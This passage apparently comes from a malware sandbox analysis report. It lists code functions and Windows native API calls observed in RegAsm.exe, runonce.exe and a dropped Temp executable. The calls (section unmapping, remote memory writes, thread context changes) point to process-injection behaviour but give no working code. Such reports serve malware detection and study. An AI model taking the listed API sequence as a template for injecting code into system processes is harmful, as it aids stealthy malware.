                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42F60 NtCreateProcessEx,5_2_02D42F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42F30 NtCreateSection,5_2_02D42F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42CC0 NtQueryVirtualMemory,5_2_02D42CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42CF0 NtOpenProcess,5_2_02D42CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42CA0 NtQueryInformationToken,5_2_02D42CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42C60 NtCreateKey,5_2_02D42C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42C00 NtQueryInformationProcess,5_2_02D42C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42DD0 NtDelayExecution,5_2_02D42DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42DB0 NtEnumerateKey,5_2_02D42DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42D10 NtMapViewOfSection,5_2_02D42D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42D00 NtSetInformationFile,5_2_02D42D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D42D30 NtUnmapViewOfSection,5_2_02D42D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D43090 NtSetValueKey,5_2_02D43090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D43010 NtOpenDirectoryObject,5_2_02D43010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D439B0 NtGetContextThread,5_2_02D439B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D43D70 NtOpenThread,5_2_02D43D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D43D10 NtOpenProcessToken,5_2_02D43D10
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C4650 NtSuspendThread,LdrInitializeThunk,10_2_052C4650
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C4340 NtSetContextThread,LdrInitializeThunk,10_2_052C4340
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_052C2D30
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_052C2D10
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_052C2DF0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2DD0 NtDelayExecution,LdrInitializeThunk,10_2_052C2DD0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2C60 NtCreateKey,LdrInitializeThunk,10_2_052C2C60
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_052C2C70
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_052C2CA0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2F30 NtCreateSection,LdrInitializeThunk,10_2_052C2F30
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2FB0 NtResumeThread,LdrInitializeThunk,10_2_052C2FB0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2FE0 NtCreateFile,LdrInitializeThunk,10_2_052C2FE0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_052C2E80
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_052C2EE0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2B60 NtClose,LdrInitializeThunk,10_2_052C2B60
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_052C2BA0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_052C2BE0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_052C2BF0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2AF0 NtWriteFile,LdrInitializeThunk,10_2_052C2AF0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2AD0 NtReadFile,LdrInitializeThunk,10_2_052C2AD0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C35C0 NtCreateMutant,LdrInitializeThunk,10_2_052C35C0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C39B0 NtGetContextThread,LdrInitializeThunk,10_2_052C39B0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2D00 NtSetInformationFile,10_2_052C2D00
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2DB0 NtEnumerateKey,10_2_052C2DB0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2C00 NtQueryInformationProcess,10_2_052C2C00
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2CF0 NtOpenProcess,10_2_052C2CF0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2CC0 NtQueryVirtualMemory,10_2_052C2CC0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2F60 NtCreateProcessEx,10_2_052C2F60
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2FA0 NtQuerySection,10_2_052C2FA0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2F90 NtProtectVirtualMemory,10_2_052C2F90
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2E30 NtWriteVirtualMemory,10_2_052C2E30
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2EA0 NtAdjustPrivilegesToken,10_2_052C2EA0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2B80 NtQueryInformationFile,10_2_052C2B80
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C2AB0 NtWaitForSingleObject,10_2_052C2AB0
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C3010 NtOpenDirectoryObject,10_2_052C3010
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C3090 NtSetValueKey,10_2_052C3090
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C3D10 NtOpenProcessToken,10_2_052C3D10
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052C3D70 NtOpenThread,10_2_052C3D70
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03279780 NtDeleteFile,10_2_03279780
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03279680 NtReadFile,10_2_03279680
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03279510 NtCreateFile,10_2_03279510
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03279980 NtAllocateVirtualMemory,10_2_03279980
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03279820 NtClose,10_2_03279820
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0503F2CF NtReadVirtualMemory,10_2_0503F2CF
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0503F8C4 NtMapViewOfSection,10_2_0503F8C4
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D928D0 4_2_00D928D0
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D90848 4_2_00D90848
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D911E0 4_2_00D911E0
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D928C1 4_2_00D928C1
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D907E0 4_2_00D907E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004188F3 5_2_004188F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00403000 5_2_00403000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004100CA 5_2_004100CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042F0D3 5_2_0042F0D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004100D3 5_2_004100D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00401240 5_2_00401240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E2E3 5_2_0040E2E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004102F3 5_2_004102F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00416AFE 5_2_00416AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00416B03 5_2_00416B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402462 5_2_00402462
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402470 5_2_00402470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E47C 5_2_0040E47C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E427 5_2_0040E427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E433 5_2_0040E433
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402750 5_2_00402750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D902C0 5_2_02D902C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DB0274 5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D1E3F0 5_2_02D1E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DD03E6 5_2_02DD03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DCA352 5_2_02DCA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DA2000 5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DC81CC 5_2_02DC81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DD01AA 5_2_02DD01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DC41A2 5_2_02DC41A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D98158 5_2_02D98158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DAA118 5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D00100 5_2_02D00100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D2C6E0 5_2_02D2C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D0C7C0 5_2_02D0C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D34750 5_2_02D34750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D10770 5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DBE4F6 5_2_02DBE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DC2446 5_2_02DC2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DB4420 5_2_02DB4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DD0591 5_2_02DD0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D10535 5_2_02D10535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D0EA80 5_2_02D0EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DC6BD7 5_2_02DC6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DCAB40 5_2_02DCAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D3E8F0 5_2_02D3E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02CF68B8 5_2_02CF68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D1A840 5_2_02D1A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D12840 5_2_02D12840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D129A0 5_2_02D129A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DDA9A6 5_2_02DDA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D26962 5_2_02D26962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DCEEDB 5_2_02DCEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D22E90 5_2_02D22E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DCCE93 5_2_02DCCE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D10E59 5_2_02D10E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DCEE26 5_2_02DCEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D02FC8 5_2_02D02FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D1CFE0 5_2_02D1CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D8EFA0 5_2_02D8EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D84F40 5_2_02D84F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D30F30 5_2_02D30F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DB2F30 5_2_02DB2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D52F28 5_2_02D52F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D00CF2 5_2_02D00CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DB0CB5 5_2_02DB0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D10C00 5_2_02D10C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D0ADE0 5_2_02D0ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D28DBF 5_2_02D28DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02DACD1F 5_2_02DACD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D1AD00 5_2_02D1AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2B2C05_2_02D2B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB12ED5_2_02DB12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D152A05_2_02D152A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D5739A5_2_02D5739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFD34C5_2_02CFD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC132D5_2_02DC132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D170C05_2_02D170C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBF0CC5_2_02DBF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC70E95_2_02DC70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCF0E05_2_02DCF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1B1B05_2_02D1B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DDB16B5_2_02DDB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D4516C5_2_02D4516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFF1725_2_02CFF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC16CC5_2_02DC16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D556305_2_02D55630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCF7B05_2_02DCF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D014605_2_02D01460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCF43F5_2_02DCF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD95C35_2_02DD95C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAD5B05_2_02DAD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC75715_2_02DC7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBDAC65_2_02DBDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D55AA05_2_02D55AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DADAAC5_2_02DADAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB1AA35_2_02DB1AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFA495_2_02DCFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC7A465_2_02DC7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D83A6C5_2_02D83A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D85BF05_2_02D85BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D4DBF95_2_02D4DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2FB805_2_02D2FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFB765_2_02DCFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D138E05_2_02D138E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7D8005_2_02D7D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D199505_2_02D19950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2B9505_2_02D2B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA59105_2_02DA5910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D19EB05_2_02D19EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D11F925_2_02D11F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFFB15_2_02DCFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFF095_2_02DCFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCFCF25_2_02DCFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D89C325_2_02D89C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2FDC05_2_02D2FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC1D5A5_2_02DC1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D13D405_2_02D13D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC7D735_2_02DC7D73
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529053510_2_05290535
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0535059110_2_05350591
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533442010_2_05334420
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534244610_2_05342446
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533E4F610_2_0533E4F6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529077010_2_05290770
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052B475010_2_052B4750
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528C7C010_2_0528C7C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AC6E010_2_052AC6E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528010010_2_05280100
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532A11810_2_0532A118
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0531815810_2_05318158
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053441A210_2_053441A2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053501AA10_2_053501AA
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053481CC10_2_053481CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532200010_2_05322000
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534A35210_2_0534A352
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053503E610_2_053503E6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529E3F010_2_0529E3F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533027410_2_05330274
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053102C010_2_053102C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529AD0010_2_0529AD00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532CD1F10_2_0532CD1F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052A8DBF10_2_052A8DBF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528ADE010_2_0528ADE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05290C0010_2_05290C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05330CB510_2_05330CB5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05280CF210_2_05280CF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05332F3010_2_05332F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D2F2810_2_052D2F28
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052B0F3010_2_052B0F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05304F4010_2_05304F40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0530EFA010_2_0530EFA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529CFE010_2_0529CFE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05282FC810_2_05282FC8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534EE2610_2_0534EE26
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05290E5910_2_05290E59
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534CE9310_2_0534CE93
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052A2E9010_2_052A2E90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534EEDB10_2_0534EEDB
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052A696210_2_052A6962
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052929A010_2_052929A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0535A9A610_2_0535A9A6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529A84010_2_0529A840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529284010_2_05292840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052768B810_2_052768B8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052BE8F010_2_052BE8F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534AB4010_2_0534AB40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05346BD710_2_05346BD7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528EA8010_2_0528EA80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534757110_2_05347571
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532D5B010_2_0532D5B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053595C310_2_053595C3
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534F43F10_2_0534F43F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0528146010_2_05281460
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534F7B010_2_0534F7B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D563010_2_052D5630
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053416CC10_2_053416CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C516C10_2_052C516C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0527F17210_2_0527F172
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0535B16B10_2_0535B16B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529B1B010_2_0529B1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534F0E010_2_0534F0E0
